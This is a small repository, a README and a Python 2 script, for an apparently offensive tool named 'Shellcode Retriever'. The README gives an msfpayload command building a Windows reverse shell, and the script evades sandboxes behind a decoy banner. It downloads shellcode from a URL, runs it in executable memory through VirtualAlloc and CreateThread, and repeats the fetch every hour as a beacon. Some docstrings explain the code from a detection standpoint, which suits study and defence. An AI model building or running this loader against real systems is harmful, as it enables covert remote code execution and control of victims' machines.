├── README.md
└── shellcode_retriever.py

/README.md:
--------------------------------------------------------------------------------
## Shellcode Retriever
Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)

Demo:

http://www.youtube.com/watch?v=R15B2p-uWKY

---

For use by IT Security professionals and researchers.

Usage:

Create shellcode using the following msfpayload command:

    msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt

Notice the exit function: it is very important if you want the process to keep running and beacon out based on the timeouts in the source code.

Upload the shellcode to your webserver.

Compile the python code to an executable by using pyinstaller.


---

## License: GPLv3


Shellcode Retriever

Author Joshua Pitts the.midnite.runr 'at' gmail com

Copyright (C) 2013, Joshua Pitts

License: GPLv3

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License

This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
#!/usr/bin/env python
'''
Shellcode Retriever

Author Joshua Pitts the.midnite.runr 'at' gmail com

Copyright (C) 2013, Joshua Pitts

License: GPLv3

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

See for a copy of the GNU General
Public License

This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.

'''

import socket
import sys
import urllib2
import ctypes
import time
import signal
#NOTE: Python 2 only (print statement, urllib2, raw_input, "except X, e").
#`signal` is imported but never referenced anywhere in this file.


#Set to True if you want to beacon every X seconds based
#on timesleep
retry = True
#time to sleep in seconds
timesleep = 3600
#Shared urllib2 opener used by get_and_execute() for every fetch. Each
#fetch is a plain HTTP(S) request to the URL supplied in main(), repeated
#every `timesleep` seconds for as long as `retry` is True.
opener = urllib2.build_opener()


def sandbox_check():
    """
    Quick sandbox check for additional av evasion.
    And a message to throw the user off.

    What the code does: attempt a TCP connect to 127.0.0.1:445; if that
    raises, attempt 127.0.0.1:135; if that raises too, print a decoy
    banner to stdout and exit the process with status 0. The two ports
    are presumably chosen because a normal Windows host listens on them
    (SMB, RPC endpoint mapper) while a minimal analysis environment may
    not -- confirm before relying on that reading. No return value; the
    only outcomes are "return normally" or "process exits".

    Things a reader should notice: both connects sit under a bare
    ``except:``, so *any* error (not only a refused connection) is
    treated as "sandbox"; the same socket object is reused for the second
    connect after the first one failed; and the socket is never closed on
    either failure path.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sandbox = True
    try:
        s.connect(('127.0.0.1', 445))
        s.close()
        sandbox = False
    except:
        pass

    if sandbox == True:
        try:
            s.connect(('127.0.0.1', 135))
            s.close()
        except:
            #Message to throw the user off:
            print "Clybase platform checker 2012\nYour platform is:", sys.platform
            sys.exit(0)


def allocate_exe(shellcode):
    """
    ctypes VirtualAlloc, MoveMem, and CreateThread
    From http://www.debasish.in/2012_04_01_archive.html

    Copies `shellcode` (a bytearray; from_buffer needs a writable buffer)
    into a freshly allocated region and runs it on a new thread inside
    this process:

    1. VirtualAlloc(NULL, len, 0x3000, 0x40): 0x3000 is
       MEM_COMMIT | MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, i.e.
       one RWX region of exactly len(shellcode) bytes.
    2. RtlMoveMemory copies the bytes into that region.
    3. CreateThread with the region's address as the start routine.
    4. WaitForSingleObject(ht, -1) (-1 == INFINITE) blocks until that
       thread finishes, so this function returns only after the payload
       thread has exited -- presumably why the README stresses
       EXITFUNC=thread for the beacon loop in main() to keep going.

    Every argument, including the returned pointer and thread handle, is
    wrapped in ctypes.c_int (32-bit), consistent with the README's
    "win32" scope. Returns None. None of the Win32 return values are
    checked (a VirtualAlloc result of 0 is not tested).

    From a detection standpoint this is the textbook in-memory loader
    sequence -- RWX allocation, memory write, CreateThread on the
    allocated address -- issued from a Python process.
    """
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0)))

    #Blocks this (main) thread until the payload thread exits.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))


def get_and_execute(openurl):
    """
    Fetch `openurl` with the module-level opener, read the entire response
    body, wrap it in a bytearray and hand it to allocate_exe().

    The response body is executed as-is: there is no integrity or origin
    check and no size limit, so whatever the server returns becomes code
    in this process. Network/HTTP errors propagate as exceptions to the
    caller (main() swallows them). Returns None.
    """
    info = opener.open(openurl)
    shellcode = info.read()
    #bytearray is mutable, which is what ctypes' from_buffer() requires.
    shellcode = bytearray(shellcode)
    allocate_exe(shellcode)


def main():
    """
    Entry point: run sandbox_check(), obtain the URL (the hard-coded value
    below, or a raw_input prompt when it is empty), then fetch-and-execute
    once and, while `retry` is True, again every `timesleep` seconds
    (3600 s as configured), forever.

    The fetch loop is wrapped in ``except Exception: pass``, so any
    failure -- network error, malformed URL, or ctypes errors such as
    ctypes.windll being unavailable off Windows -- ends the program
    silently with no output. SystemExit from sandbox_check() is raised
    before the try block and is not caught here.
    """
    sandbox_check()
    #set a url below or leave as '' to manually enter
    openurl = ''
    if openurl == '':
        openurl = raw_input("Give me a url: ")
    try:
        get_and_execute(openurl)
        while retry is True:
            time.sleep(timesleep)
            get_and_execute(openurl)

    except Exception, e:
        #print str(e)
        #Deliberately silent: errors are discarded and the process ends.
        pass

if __name__ == "__main__":
    main()